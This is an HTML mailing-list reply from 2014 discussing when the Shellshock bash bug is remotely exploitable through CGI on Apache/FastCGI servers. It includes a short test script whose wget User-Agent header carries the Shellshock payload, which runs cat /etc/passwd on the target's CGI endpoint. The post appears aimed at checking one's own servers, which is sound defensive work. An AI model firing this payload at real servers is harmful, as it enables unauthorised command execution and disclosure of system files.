<div dir="ltr"><br><div class="gmail_extra"><br><div class="gmail_quote">On Thu, Sep 25, 2014 at 5:24 PM, Hubert Chathi <span dir="ltr"><<a href="mailto:hubert@uhoreg.ca" target="_blank">hubert@uhoreg.ca</a>></span> wrote:<br><blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left:1px solid rgb(204,204,204);padding-left:1ex">For the bash bug, the only way for it to be remotely exploitable is if
you are running a server that executes programs using bash in response
to remote requests.  For example (probably the most common), if your web<br>
server executes a cgi script using bash.  But if you do not allow cgi
scripts (e.g. if you are only using PHP, via mod_php), then you should
be safe.  </blockquote><div><br></div><div>Correct.<br><br>Except that many (including me, and many in the PHP CMS universe) choose not to run mod_php because of its memory footprint, and opt for FastCGI, with PHP running as PHP-FPM, and either Apache threaded frontending it or nginx.<br><br>For example, this is from a server we manage (Ubuntu 12.04, and 14.04):<br><br># a2dismod <br>Your choices are: actions alias auth_basic authn_file authz_default authz_groupfile authz_host authz_user cgid deflate dir env expires fastcgi mime reqtimeout rewrite setenvif status<br><br></div><div>Note the cgid there.<br><br></div><div>So far, I ran a few scans on unpatched servers, and could not get in, because there is no cgi script to be exploited.<br><br>Here is the example script I tried<br><br>#!/bin/sh<br><br>wget -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" <a href="http://example.com/cgi-bin/test.cgi">http://example.com/cgi-bin/test.cgi</a><br><br></div></div>-- <br>Khalid M. Baheyeldin<br><a href="http://2bits.com" target="_blank">2bits.com</a>, Inc.<br>Fast Reliable Drupal<br>Drupal optimization, development, customization and consulting.<br>Simplicity is prerequisite for reliability. --  Edsger W.Dijkstra<br>Simplicity is the ultimate sophistication. --   Leonardo da Vinci<br>For every complex problem, there is an answer that is clear, simple, and wrong." -- H.L. Mencken<br>
</div></div>